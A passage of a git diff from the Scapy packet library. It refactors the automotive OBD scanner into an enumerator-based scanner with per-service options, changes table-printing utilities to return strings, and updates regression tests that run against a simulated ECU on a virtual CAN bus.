-f, --full Full scan on id services + -v, --verbose Display information during scan + -1 Scan OBD Service 01 + -2 Scan OBD Service 02 + -3 Scan OBD Service 03 + -6 Scan OBD Service 06 + -7 Scan OBD Service 07 + -8 Scan OBD Service 08 + -9 Scan OBD Service 09 + -A Scan OBD Service 0A\n Example of use:\n Python2 or Windows: python2 -m scapy.tools.automotive.obdscanner --interface=pcan --channel=PCAN_USBBUS1 --source=0x070 --destination 0x034 @@ -77,16 +84,18 @@ def main(): source = 0x7e0 destination = 0x7df timeout = 0.1 - supported = False - unsupported = False + full_scan = False + specific_scan = False verbose = False python_can_args = None + custom_enumerators = [] + conf.verb = -1 options = getopt.getopt( sys.argv[1:], - 'i:c:s:d:a:t:hruv', + 'i:c:s:d:a:t:hfv1236789A', ['interface=', 'channel=', 'source=', 'destination=', - 'help', 'timeout=', 'python-can_args=', 'supported', 'unsupported', + 'help', 'timeout=', 'python-can_args=', 'full', 'verbose']) try: @@ -106,10 +115,32 @@ def main(): sys.exit(0) elif opt in ('-t', '--timeout'): timeout = float(arg) - elif opt in ('-r', '--supported'): - supported = True - elif opt in ('-u', '--unsupported'): - unsupported = True + elif opt in ('-f', '--full'): + full_scan = True + elif opt == '-1': + specific_scan = True + custom_enumerators += [OBD_S01_Enumerator] + elif opt == '-2': + specific_scan = True + custom_enumerators += [OBD_S02_Enumerator] + elif opt == '-3': + specific_scan = True + custom_enumerators += [OBD_S03_Enumerator] + elif opt == '-6': + specific_scan = True + custom_enumerators += [OBD_S06_Enumerator] + elif opt == '-7': + specific_scan = True + custom_enumerators += [OBD_S07_Enumerator] + elif opt == '-8': + specific_scan = True + custom_enumerators += [OBD_S08_Enumerator] + elif opt == '-9': + specific_scan = True + custom_enumerators += [OBD_S09_Enumerator] + elif opt == '-A': + specific_scan = True + custom_enumerators += [OBD_S0A_Enumerator] elif opt in ('-v', '--verbose'): verbose = True except getopt.GetoptError as msg: @@ -151,7 +182,16 @@ def main(): with ISOTPSocket(csock, source, destination, basecls=OBD, padding=True) as isock: signal.signal(signal.SIGINT, signal_handler) - obd_scan(isock, timeout, supported, unsupported, verbose) + if specific_scan: + es = custom_enumerators + else: + es = OBD_Scanner.default_enumerator_clss + s = OBD_Scanner(isock, enumerators=es, full_scan=full_scan, + verbose=verbose, timeout=timeout) + print("Starting OBD-Scan...") + s.scan() + for e in s.enumerators: + e.show() except Exception as e: usage(True) diff --git a/scapy/utils.py b/scapy/utils.py index 8af7bed5a5b..1f5aa8eb4c1 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1941,7 +1941,7 @@ def pretty_list(rtlst, header, sortBy=0, borders=False): return rt -def __make_table(yfmtfunc, fmtfunc, endline, data, fxyz, sortx=None, sorty=None, seplinefunc=None): # noqa: E501 +def __make_table(yfmtfunc, fmtfunc, endline, data, fxyz, sortx=None, sorty=None, seplinefunc=None, dump=False): # noqa: E501 """Core function of the make_table suite, which generates the table""" vx = {} vy = {} @@ -1982,39 +1982,49 @@ def __make_table(yfmtfunc, fmtfunc, endline, data, fxyz, sortx=None, sorty=None, except Exception: vyk.sort() + s = "" if seplinefunc: sepline = seplinefunc(tmp_len, [vx[x] for x in vxk]) - print(sepline) + s += sepline + "\n" fmt = yfmtfunc(tmp_len) - print(fmt % "", end=' ') + s += fmt % "" + s += ' ' for x in vxk: vxf[x] = fmtfunc(vx[x]) - print(vxf[x] % x, end=' ') - print(endline) + s += vxf[x] % x + s += ' ' + s += endline + "\n" if seplinefunc: - print(sepline) + s += sepline + "\n" for y in vyk: - print(fmt % y, end=' ') + s += fmt % y + s += ' ' for x in vxk: - print(vxf[x] % vz.get((x, y), "-"), end=' ') - print(endline) + s += vxf[x] % vz.get((x, y), "-") + s += ' ' + s += endline + "\n" if seplinefunc: - print(sepline) + s += sepline + "\n" + + if dump: + return s + else: + print(s, end="") def make_table(*args, **kargs): - __make_table(lambda l: "%%-%is" % l, lambda l: "%%-%is" % l, "", *args, **kargs) # noqa: E501 + return __make_table(lambda l: "%%-%is" % l, lambda l: "%%-%is" % l, "", *args, **kargs) # noqa: E501 def make_lined_table(*args, **kargs): - __make_table(lambda l: "%%-%is |" % l, lambda l: "%%-%is |" % l, "", - seplinefunc=lambda a, x: "+".join('-' * (y + 2) for y in [a - 1] + x + [-2]), # noqa: E501 - *args, **kargs) + return __make_table(lambda l: "%%-%is |" % l, lambda l: "%%-%is |" % l, "", + seplinefunc=lambda a, x: "+".join('-' * (y + 2) for y in [a - 1] + x + [-2]), # noqa: E501 + *args, **kargs) def make_tex_table(*args, **kargs): - __make_table(lambda l: "%s", lambda l: "& %s", "\\\\", seplinefunc=lambda a, x: "\\hline", *args, **kargs) # noqa: E501 + return __make_table(lambda l: "%s", lambda l: "& %s", "\\\\", seplinefunc=lambda a, x: "\\hline", *args, **kargs) # noqa: E501 #################### # WHOIS CLIENT # @@ -2076,3 +2086,28 @@ def run(self): def stop(self): self._stopped.set() + + +class SingleConversationSocket(object): + def __init__(self, o): + self._inner = o + self._tx_mutex = threading.RLock() + + @property + def __dict__(self): + return self._inner.__dict__ + + def __getattr__(self, name): + return getattr(self._inner, name) + + def sr1(self, *args, **kargs): + with self._tx_mutex: + return self._inner.sr1(*args, **kargs) + + def sr(self, *args, **kargs): + with self._tx_mutex: + return self._inner.sr(*args, **kargs) + + def send(self, x): + with self._tx_mutex: + return self._inner.send(x) diff --git a/test/contrib/automotive/enumerator.uts b/test/contrib/automotive/enumerator.uts new file mode 100644 index 00000000000..ca45af1d2a0 --- /dev/null +++ b/test/contrib/automotive/enumerator.uts @@ -0,0 +1,153 @@ +% Regression tests for enumerators + ++ Load general modules + += Load contribution layer + +from scapy.contrib.automotive.enumerator import * +from scapy.contrib.automotive.uds import * + + ++ Basic checks += Enumerator basecls checks + +pkts = [ + Enumerator.ScanResult("s1", UDS(b"\x20abcd"), UDS(b"\x60abcd")), + Enumerator.ScanResult("s2", UDS(b"\x20abcd"), None), + Enumerator.ScanResult("s1", UDS(b"\x21abcd"), UDS(b"\x7fabcd")), + Enumerator.ScanResult("s2", UDS(b"\x21abcd"), UDS(b"\x61abcd")), +] + +pkts[0].req.sent_time = 1.0 +pkts[1].req.sent_time = 2.0 +pkts[2].req.sent_time = 3.0 +pkts[3].req.sent_time = 4.0 + + +pkts[0].resp.time = 1.9 +pkts[2].resp.time = 3.1 +pkts[3].resp.time = 4.5 + + +e = Enumerator(None) +e.results = pkts + + += Enumerator not completed check + +assert e.completed == False + + += Enumerator stats check + +e.update_stats() +assert e.stats["answered"] == 3 +assert e.stats["unanswered"] == 1 +assert round(e.stats["answertime_max"], 1) == 0.9 +assert round(e.stats["answertime_min"], 1) == 0.1 +assert round(e.stats["answertime_avg"], 1) == 0.5 +assert e.stats["negative_resps"] == 1 + + += Enumerator filtered results + +assert len(e.filtered_results) == 3 +assert e.filtered_results[0] == pkts[0] +assert e.filtered_results[1] == pkts[2] + + += Enumerator scanned states + +assert len(e.scanned_states) == 2 +assert {"s1", "s2"} == e.scanned_states + += Enumerator show + +def show_negative_response_details(self, dump=False): + pass + + +def get_table_entry(tup): + state, req, res = tup + label = Enumerator.get_label(res) + return state, "0x%02x: %s" % (req.service, req.sprintf("%UDS.service%")), label + +e.show_negative_response_details = show_negative_response_details +e.get_table_entry = get_table_entry + +e.show(filtered=False) + +dump = e.show(dump=True, filtered=False) +assert "NegativeResponse" in dump +assert "PositiveResponse" in dump +assert "PR:" in dump +assert "NR:" in dump +assert "s1" in dump +assert "s2" in dump +assert "Times between request and response:\tMIN: 0.100000\tMAX: 0.900000\tAVG: 0.500000" in dump + + += Enumerator get_label + +assert Enumerator.get_label(pkts[0].resp) == "PR: PositiveResponse" +assert Enumerator.get_label(pkts[1].resp) == "Timeout" +assert Enumerator.get_label(pkts[2].resp) == "NR: NegativeResponse" +assert Enumerator.get_label(pkts[3].resp, lambda: "positive") == "positive" +assert Enumerator.get_label(pkts[3].resp, lambda: "positive" + hex(pkts[3].req.service)) == "positive" + "0x21" + += Enumerator completed + +e.state_completed["s1"] = True +e.state_completed["s2"] = True + +assert e.completed + ++ Graph tests + += Basic test + +g = Graph() +g.add_edge("1", "1") +g.add_edge("1", "2") +g.add_edge("2", "3") +g.add_edge("3", "4") +g.add_edge("4", "4") + +assert "1" in g.nodes +assert "2" in g.nodes +assert "3" in g.nodes +assert "4" in g.nodes +assert len(g.nodes) == 4 +assert g.dijsktra(g, "1", "4") == ["1", "2", "3", "4"] + += Shortest path test + +g = Graph() +g.add_edge("1", "1") +g.add_edge("1", "2") +g.add_edge("2", "3") +g.add_edge("3", "4") +g.add_edge("4", "4") + +assert g.dijsktra(g, "1", "4") == ["1", "2", "3", "4"] + +g.add_edge("1", "4") + +assert g.dijsktra(g, "1", "4") == ["1", "4"] + +g.add_edge("3", "5") +g.add_edge("5", "6") + +print(g.dijsktra(g, "1", "6")) + +assert g.dijsktra(g, "1", "6") == ["1", "2", "3", "5", "6"] or g.dijsktra(g, "1", "6") == ['1', '4', '3', '5', '6'] + +g.add_edge("2", "5") + +print(g.dijsktra(g, "1", "6")) + +assert g.dijsktra(g, "1", "6") == ["1", "2", "5", "6"] + +g.add_edge("4", "6") + +assert g.dijsktra(g, "1", "6") == ["1", "4", "6"] diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index c0df953a80f..02b841355dc 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -131,36 +131,11 @@ load_contrib('automotive.obd.obd') from subprocess import call -from scapy.contrib.automotive.obd.scanner import obd_scan -from scapy.contrib.automotive.obd.scanner import _supported_id_numbers +from scapy.contrib.automotive.obd.scanner import * from scapy.contrib.automotive.ecu import * = Create answers -s3 = OBD()/OBD_S03_PR(dtcs=[OBD_DTC()]) - -s1_pid00 = OBD() / OBD_S01_PR(data_records=[OBD_S01_PR_Record() / OBD_PID00(supported_pids="PID03+PID0B+PID0F")]) -s6_mid00 = OBD() / OBD_S06_PR(data_records=[OBD_S06_PR_Record() / OBD_MID00(supported_mids="")]) -s8_tid00 = OBD() / OBD_S08_PR(data_records=[OBD_S08_PR_Record() / OBD_TID00(supported_tids="")]) -s9_iid00 = OBD() / OBD_S09_PR(data_records=[OBD_S09_PR_Record() / OBD_IID00(supported_iids="")]) - - -s1_pid01 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID01()]) -s1_pid03 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID03(fuel_system1=0, fuel_system2=2)]) -s1_pid0B = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0B(data=100)]) -s1_pid0F = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0F(data=50)]) - -example_responses = \ - [ECUResponse(session=range(0, 255), security_level=0, responses=s3), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s6_mid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s8_tid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s9_iid00), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid01), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid03), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid0B), - ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid0F)] - responses = [ ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=0)/OBD_PID00(supported_pids=3191777299)])), ECUResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=1)/OBD_PID01(mil=0, dtc_count=0, reserved1=0, continuous_tests_ready=0, reserved2=0, continuous_tests_supported=7, once_per_trip_tests_supported=225, once_per_trip_tests_ready=0)])), @@ -230,7 +205,7 @@ responses = [ + Simulate scanner -= Run scanner with real world responses += Run scanner with real world responses short scan exit_if_no_isotp_module() @@ -238,92 +213,108 @@ drain_bus(iface0) with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: answering_machine = ECU_am(supported_responses=responses, main_socket=ecu, basecls=OBD) - sim = threading.Thread(target=answering_machine, kwargs={"timeout": 3}) + sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e0, 0x7e8, basecls=OBD, padding=True) as socket: - data = obd_scan(socket, 0.01, True, False, verbose=False) - dtc = data[0] - print(data) - supported = data[1] - unsupported = data[2] - + s = OBD_Scanner(socket, full_scan=False) + s.scan() + socket.send(b"\xff\xff\xff") finally: sim.join(timeout=10) -= Run scanner +assert len(s.enumerators) == 8 +assert s.enumerators[0].__class__ == OBD_S01_Enumerator +assert s.enumerators[1].__class__ == OBD_S02_Enumerator +assert s.enumerators[2].__class__ == OBD_S06_Enumerator +assert s.enumerators[3].__class__ == OBD_S08_Enumerator +assert s.enumerators[4].__class__ == OBD_S09_Enumerator +assert s.enumerators[5].__class__ == OBD_S03_Enumerator +assert s.enumerators[6].__class__ == OBD_S07_Enumerator +assert s.enumerators[7].__class__ == OBD_S0A_Enumerator + +assert len(s.enumerators[0].results) == 33 # 32 pos resps + 1 NR +assert len([r for _, _, r in s.enumerators[0].results if r is not None and r.service == 0x7f]) == 1 +assert len(s.enumerators[1].results) == 1 # 1 NR +assert len([r for _, _, r in s.enumerators[1].results if r is not None and r.service == 0x7f]) == 1 +assert len(s.enumerators[2].results) == 18 # 17 pos resps + 1 NR +assert len([r for _, _, r in s.enumerators[2].results if r is not None and r.service == 0x7f]) == 1 +assert len(s.enumerators[3].results) == 1 # 1 NR +assert len([r for _, _, r in s.enumerators[3].results if r is not None and r.service == 0x7f]) == 1 +assert len(s.enumerators[4].results) == 9 # 8 pos resps + 1 NR +assert len([r for _, _, r in s.enumerators[4].results if r is not None and r.service == 0x7f]) == 1 +assert len(s.enumerators[5].results) == 1 # 1 PR +assert len(s.enumerators[6].results) == 1 # 1 PR +assert len(s.enumerators[7].results) == 1 # 1 PR + + += Run scanner with real world responses full scan exit_if_no_isotp_module() drain_bus(iface0) with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD) - sim = threading.Thread(target=answering_machine, kwargs={'count': 12}) + answering_machine = ECU_am(supported_responses=responses, main_socket=ecu, basecls=OBD) + sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e0, 0x7e8, basecls=OBD, padding=True) as socket: - all_ids_set = set(range(1, 256)) - supported_ids = _supported_id_numbers(socket, 0.1, OBD_S01, 'pid', False) - unsupported_ids = all_ids_set - supported_ids - drain_bus(iface0) - # timeout to avoid a deadlock if the test which sets this event fails - with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e0, 0x7e8, basecls=OBD, padding=True) as socket: - data = obd_scan(socket, 0.01, True, True, verbose=False) - dtc = data[0] - print(data) - supported = data[1] - unsupported = data[2] - + s = OBD_Scanner(socket, full_scan=True) + s.scan() + socket.send(b"\xff\xff\xff") finally: sim.join(timeout=10) - -+ Check results - -= Check supported ids - -exit_if_no_isotp_module() - -supported_ids_set = set([3, 11, 15]) -assert supported_ids == supported_ids_set - -= Check unsupported ids - -exit_if_no_isotp_module() - -unsupported_ids_set = all_ids_set - supported_ids_set -assert unsupported_ids == unsupported_ids_set - -= Check service 1 - -exit_if_no_isotp_module() - -assert len(supported[1]) == 3 - -= Check service 3 - -exit_if_no_isotp_module() - -assert dtc[3] == bytes(s3) - -= Check empty services +assert len(s.enumerators) == 8 +assert s.enumerators[0].__class__ == OBD_S01_Enumerator +assert s.enumerators[1].__class__ == OBD_S02_Enumerator +assert s.enumerators[2].__class__ == OBD_S06_Enumerator +assert s.enumerators[3].__class__ == OBD_S08_Enumerator +assert s.enumerators[4].__class__ == OBD_S09_Enumerator +assert s.enumerators[5].__class__ == OBD_S03_Enumerator +assert s.enumerators[6].__class__ == OBD_S07_Enumerator +assert s.enumerators[7].__class__ == OBD_S0A_Enumerator + +assert len(s.enumerators[0].results) == 0x100 # 32 pos resps + 1 NR +assert len([r for _, _, r in s.enumerators[0].results if r is not None and r.service == 0x7f]) == 0x100 - 32 +assert len(s.enumerators[1].results) == 0x100 +assert len([r for _, _, r in s.enumerators[1].results if r is not None and r.service == 0x7f]) == 0x100 +assert len(s.enumerators[2].results) == 0x100 # 17 pos resps +assert len([r for _, _, r in s.enumerators[2].results if r is not None and r.service == 0x7f]) == 0x100 - 17 +assert len(s.enumerators[3].results) == 0x100 +assert len([r for _, _, r in s.enumerators[3].results if r is not None and r.service == 0x7f]) == 0x100 +assert len(s.enumerators[4].results) == 0x100 # 8 pos resps +assert len([r for _, _, r in s.enumerators[4].results if r is not None and r.service == 0x7f]) == 0x100 - 8 +assert len(s.enumerators[5].results) == 1 # 1 PR +assert len(s.enumerators[6].results) == 1 # 1 PR +assert len(s.enumerators[7].results) == 1 # 1 PR + + += Run scanner only for Service 01 real world responses exit_if_no_isotp_module() -assert len(supported[6]) == 0 -assert len(supported[8]) == 0 -assert len(supported[9]) == 0 +drain_bus(iface0) -print(dtc) -assert dtc[7] == b'\x7f\x07\x10' -assert dtc[10] == b'\x7f\n\x10' +with new_can_socket0() as isocan_ecu, ISOTPSocket(isocan_ecu, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: + answering_machine = ECU_am(supported_responses=responses, main_socket=ecu, basecls=OBD) + sim = threading.Thread(target=answering_machine, kwargs={"timeout": 60, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) + sim.start() + try: + with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e0, 0x7e8, basecls=OBD, padding=True) as socket: + s = OBD_Scanner(socket, enumerators=[OBD_S01_Enumerator], full_scan=False) + s.scan() + socket.send(b"\xff\xff\xff") + finally: + sim.join(timeout=10) -= Check unsupported service 1 +assert len(s.enumerators) == 1 +assert s.enumerators[0].__class__ == OBD_S01_Enumerator -exit_if_no_isotp_module() +assert len(s.enumerators[0].results) == 33 # 32 pos resps + 1 NR +assert len([r for _, _, r in s.enumerators[0].results if r is not None and r.service == 0x7f]) == 1 -assert unsupported[1][1] == bytes(s1_pid01) + Cleanup diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 1631c4354f6..c86d3f6dd46 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -122,12 +122,7 @@ else: print(sys.executable) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() - std_out, std_err = result.communicate() -if returncode: - print(std_out) - print(std_err) - assert returncode != 0 expected_output = plain_str(b'usage:') @@ -140,16 +135,13 @@ assert result.wait() == 0 std_out, std_err = result.communicate() assert not std_err expected_output = plain_str(b'Scan for all possible obd service classes and their subfunctions.') -print(std_out) assert expected_output in plain_str(std_out) = Test wrong socket for Python2 or Windows if six.PY2: version = subprocess.Popen(["python2", "--version"], stdout=subprocess.PIPE) - if 0 == version.wait(): - print(version.communicate()) - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py", "-c", "vcan0", "-s", "0x600", "-d", "0x601"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py", "-c", "vcan0", "-s", "0x600", "-d", "0x601", "-t", "0.001"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) assert result.wait() == 1 expected_output = plain_str(b'Please provide all required arguments.') std_out, std_err = result.communicate() @@ -157,37 +149,31 @@ if six.PY2: = Test Python2 call if six.PY2: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py", "-i", "socketcan", "-c", "vcan0", "-s", "0x600", "-d", "0x601", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py", "-i", "socketcan", "-c", "vcan0", "-s", "0x600", "-d", "0x601", "-v", "-t", "0.001"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() std_out, std_err = result.communicate() - print(returncode) assert returncode == 0 expected_output = plain_str(b'Starting OBD-Scan...') - print(std_out) - print(expected_output) assert expected_output in plain_str(std_out) = Test Python2 call with python-can args if six.PY2: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py", "-i", "socketcan", "-c", "vcan0", "-s", "0x600", "-d", "0x601", "-v", "-a", "bitrate=250000"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py", "-i", "socketcan", "-c", "vcan0", "-s", "0x600", "-d", "0x601", "-v", "-a", "bitrate=250000", "-t", "0.001"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() std_out, std_err = result.communicate() - print(returncode) assert returncode == 0 expected_output = plain_str(b'Starting OBD-Scan...') - print(std_out) - print(expected_output) assert expected_output in plain_str(std_out) + Scan tests = Load contribution layer -load_contrib('automotive.obd.obd') + +from scapy.contrib.automotive.obd.obd import * + Simulate scanner = Test DTC scan -temporary_skip_unstable_test() drain_bus(iface0) @@ -195,27 +181,28 @@ s3 = OBD()/OBD_S03_PR(dtcs=[OBD_DTC()]) example_responses = [ECUResponse(session=range(0,255), security_level=0, responses=s3)] -with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD) - sim = threading.Thread(target=answering_machine, kwargs={'count': 3, 'timeout': 10, 'stop_filter': lambda p: p.service == 0xff}) +with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ + new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: + conf.verb = -1 + answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) + sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 15, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.05"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.15"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out, std_err = result.communicate() - if six.PY2: - expected_output = b"Service 3:\nC\x01\x00\x00" - else: - expected_output = b"Service 3:\nb'C\\x01\\x00\\x00'" - + print(std_out) + print(std_err) + expected_output = b"1 requests were sent, 1 answered" assert bytes_encode(expected_output) in bytes_encode(std_out) - + time.sleep(1) + except Exception as e: + print(e) finally: - isocan.send(CAN(identifier=0x7e0, data=b'\x07\xff\xff\xff\xff\xff\xff\xff')) + tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) = Test supported PIDs scan -temporary_skip_unstable_test() drain_bus(iface0) @@ -241,37 +228,85 @@ example_responses = \ -with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD) - sim = threading.Thread(target=answering_machine, kwargs={'count': 10, 'timeout': 10, 'stop_filter': lambda p: p.service == 0xff}) +with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ + new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: + answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) + sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.1", "-r"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) - + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.15"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) std_out, std_err = result.communicate() + print(std_out) + print(std_err) assert std_err == b'' - if six.PY2: - expected_output = [b"Service 3:\nC\x01\x00\x00", - b"Service 1:\n{", - b"3: 'A\\x03\\x00\\x02'", - b"11: 'A\\x0bd'", - b"15: 'A\\x0fZ'"] - else: - expected_output = [b"Service 3:\nb'C\\x01\\x00\\x00'", - b"Service 1:\n{", - b"3: b'A\\x03\\x00\\x02'", - b"11: b'A\\x0bd'", - b"15: b'A\\x0fZ'"] + expected_output = ["5 requests were sent, 4 answered", + "2 requests were sent, 1 answered", + "1 requests were sent, 1 answered"] + time.sleep(1) + for out in expected_output: + assert bytes_encode(out) in bytes_encode(std_out) + except Exception as e: + print(e) + tester.send(b"\x01\xff\xff\xff\xff") + sim.join(timeout=10) + raise e + finally: + tester.send(b"\x01\xff\xff\xff\xff") + sim.join(timeout=10) + + += Test only Service 01 PIDs scan + +drain_bus(iface0) + +s1_pid00 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID00(supported_pids="PID03+PID0B+PID0F")]) +s6_mid00 = OBD()/OBD_S06_PR(data_records=[OBD_S06_PR_Record()/OBD_MID00(supported_mids="")]) +s8_tid00 = OBD()/OBD_S08_PR(data_records=[OBD_S08_PR_Record()/OBD_TID00(supported_tids="")]) +s9_iid00 = OBD()/OBD_S09_PR(data_records=[OBD_S09_PR_Record()/OBD_IID00(supported_iids="")]) + +s1_pid03 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID03(fuel_system1=0, fuel_system2=2)]) +s1_pid0B = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0B(data=100)]) +s1_pid0F = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0F(data=50)]) +# Create answers for 'supported PIDs scan' +example_responses = \ + [ECUResponse(session=range(0, 255), security_level=0, responses=s3), + ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid00), + ECUResponse(session=range(0, 255), security_level=0, responses=s6_mid00), + ECUResponse(session=range(0, 255), security_level=0, responses=s8_tid00), + ECUResponse(session=range(0, 255), security_level=0, responses=s9_iid00), + ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid03), + ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid0B), + ECUResponse(session=range(0, 255), security_level=0, responses=s1_pid0F)] + + + +with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ + new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: + answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) + sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) + sim.start() + try: + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.15", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out, std_err = result.communicate() + print(std_out) + print(std_err) + assert std_err == b'' + expected_output = ["5 requests were sent, 4 answered"] + time.sleep(1) for out in expected_output: assert bytes_encode(out) in bytes_encode(std_out) + except Exception as e: + print(e) + tester.send(b"\x01\xff\xff\xff\xff") + sim.join(timeout=10) + raise e finally: - isocan.send(CAN(identifier=0x7e0, data=b'\x07\xff\xff\xff\xff\xff\xff\xff')) + tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) = Test full scan -temporary_skip_unstable_test() drain_bus(iface0) @@ -279,38 +314,30 @@ drain_bus(iface0) s1_pid01 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID01()]) example_responses.append(ECUResponse(session=range(0,255), security_level=0, responses=s1_pid01)) -with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu: - answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD) - sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'count': 1000, 'timeout': 50, 'stop_filter': lambda p: p.service == 0xff}) +with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, padding=True) as ecu, \ + new_can_socket0() as isocan2, ISOTPSocket(isocan2, 0x7e0, 0x7e8, basecls=OBD, padding=True) as tester: + answering_machine = ECU_am(supported_responses=example_responses, main_socket=ecu, basecls=OBD, verbose=False) + sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - 